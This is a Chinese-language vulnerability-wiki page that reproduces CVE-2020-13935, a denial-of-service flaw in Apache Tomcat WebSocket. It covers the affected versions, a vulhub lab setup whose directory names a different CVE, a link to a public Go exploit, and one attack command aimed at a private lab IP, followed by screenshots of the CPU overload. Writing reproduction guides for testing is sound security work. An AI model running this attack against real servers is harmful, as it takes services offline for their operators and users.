menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Apache Tomcat chevron_right Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md
    2.53 KB / 2021-07-04 06:01:08
        # Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935

## 漏洞描述

2020年11月06日,360CERT监测发现`@RedTeamPentesting`发布了`Tomcat WebSokcet 拒绝服务漏洞` 的分析报告,该漏洞编号为 `CVE-2020-13935` ,漏洞等级:`高危` ,漏洞评分:`7.5` 。

未授权的远程攻击者通过发送 `大量特制请求包` 到Tomcat服务器 ,可造成服务器停止响应并无法提供正常服务

## 漏洞影响

> [!NOTE]
>
> Apache Tomcat 10.0.0-M1-10.0.0-M6
> Apache Tomcat 9.0.0.M1-9.0.36
> Apache Tomcat 8.5.0-8.5.56
> Apache Tomcat 7.0.27-7.0.104

## 环境搭建

```
https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2020-1938
docker-compose up -d
```

## 漏洞复现

访问目标,查看版本是否在漏洞版本范围内

![](http://wikioss.peiqi.tech/vuln/tomcat-8.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

查看攻击前的内存使用情况

![](http://wikioss.peiqi.tech/vuln/tomcat-9.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

[CVE-2020-13935 EXP地址](https://github.com/RedTeamPentesting/CVE-2020-13935)

> [!NOTE]
>
> EXP使用需要GO环境

![](http://wikioss.peiqi.tech/vuln/tomcat-10.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

如果出现

```go
go: github.com/gorilla/[email protected]: Get "https://proxy.golang.org/github.com/gorilla/websocket/@v/v1.4.2.mod": dial tcp 172.217.160.81:443: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
```

```
需要使用命令切换源
go env -w GOPROXY=https://goproxy.cn
```

使用EXP攻击

```
tcdos    ws://192.168.51.133:8080/examples/websocket/echoStreamAnnotation
```

![](http://wikioss.peiqi.tech/vuln/tomcat-11.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

CPU 负荷超载,成功攻击

## 漏洞利用POC

[CVE-2020-13935 EXP地址](https://github.com/RedTeamPentesting/CVE-2020-13935)
    links
    file_download